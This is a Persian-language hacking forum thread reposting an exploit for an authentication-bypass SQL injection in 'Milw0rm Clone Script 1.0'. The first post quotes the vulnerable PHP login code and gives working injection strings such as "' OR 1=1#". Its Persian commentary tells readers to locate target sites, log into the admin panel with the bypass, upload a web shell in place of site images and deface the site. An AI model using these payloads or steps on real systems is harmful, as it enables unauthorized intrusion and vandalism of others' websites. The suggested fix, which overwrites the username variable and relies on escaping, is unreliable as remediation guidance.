انجمن تیم امنیتی ایران سایبر

Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability

شروع موضوع توسط Endless ‏15/6/15 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. Endless
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏20/12/14
    ارسال ها:
    282
    تشکر شده:
    704
    جنسیت:
    شغل:
    Hacker & Exploiter
    محل سکونت:
    Iran-Tehran
    Name:
    WhiteTiger
    Main os:
    Kali
    PHP:
    |  Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability |
    |  Date: 06.13.2015  |
    |  Exploit Daddy: Walid Naceri  |
    | Vendor Homepage: http://milw0rm.sourceforge.net/  |
    |  Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download  |
    |  Version: v1.0  |
    |  Tested On: Kali Linux, Mac, Windows  |
    |><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
    | Website exploiter: WwW.security-Dz.Com  |
    | CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA  |
    | Sorry: Sorry pancaker, you missed that one :(  |
    <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
    ### vuln codez  admin/login.php ###
    <?
    $usr 
    htmlspecialchars(trim($_POST['usr'])); ---- what are you doing?
    $pwd htmlspecialchars(trim($_POST['pwd'])); ---- are you sure that you are a programmer?
    if(
    $usr && $pwd){
    $login mysql_query("SELECT * FROM `site_info` WHERE `adm_usr`='".$usr."' AND `adm_pwd`='".md5($pwd)."';");
    $row mysql_num_rows($login);
    ----
    Bla Bla Bla--------
    ### manual ###
    Go to the login admin panel :)

    Exploit 1:
    USERADMIN' OR ''='
    PASSADMIN' OR ''='

    Exploit 2:
    USERADMIN' OR 1=1#
    PASS: Anything Bro :)



    ### How to fix, learn bro some php again :) ###

    $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['
    usr'])));
    $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['
    pwd'])));
    خب این همون بایپس خودمونه
    که شما پس از پیدا کردن تارگت
    این رو به اخرش اضافه میکنید.
    admin/login.php
    بعد یوزر و پس هم
    '=''or'
    وارد کنید و وارد پنل مدیریت بشید.
    بعدشم جای اون img هایی که ادمین سایت برای سایت شخصیش قرار داده شل بگذارید و اپلود کنید.
    و به لینک شل بروید و سایت رو دیف کنید.
    با تشکر
    یا حق
    ./
     
    آخرین بار توسط مدیر ویرایش شد: ‏15/6/15
    WH!T3_W01F، Rz07، MOHAMAD-NOFOZI و یک نفر دیگر از این ارسال تشکر کرده اند.
  2. amirhamid009
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏24/1/15
    ارسال ها:
    1
    تشکر شده:
    1
    دورک نداره؟
     
    Rz07 از این پست تشکر کرده است.
  3. Endless
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏20/12/14
    ارسال ها:
    282
    تشکر شده:
    704
    جنسیت:
    شغل:
    Hacker & Exploiter
    محل سکونت:
    Iran-Tehran
    Name:
    WhiteTiger
    Main os:
    Kali
    اسپم نکنید.
    نه متاسفانه داخل اکسپلویت دورکی قرار گرفته نشده
    با تشکر
     
    Rz07 از این پست تشکر کرده است.
  4. KamraN HellisH
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏5/12/14
    ارسال ها:
    187
    تشکر شده:
    220
    جنسیت:
    محل سکونت:
    etc/passwd
    Name:
    Kamran
    Main os:
    Windows
    دوست عزیز این سی ام اس برای سایت های ثبت اکسپلویت هست

    مانند iedb.ir

    موفق باشید
     
    WH!T3_W01F، Rz07 و MOHAMAD-NOFOZI از این ارسال تشکر کرده اند.
  5. Rz07
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏2/5/15
    ارسال ها:
    26
    تشکر شده:
    19
    دنبال اسکریپت 1337days هستم
    یه سایت پیدا کردم منتها توضیحی نداده
    برای نمایش این قسمت باید وارد سیستم شوید یا اینکه ثبت نام نمایید
    کسی اسکریپت این سایت رو داره؟
     
    آخرین ویرایش: ‏16/6/15
بارگذاری...
مطالب مشابه
  1. 0day
    پاسخ ها:
    0
    دانلودها:
    229
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .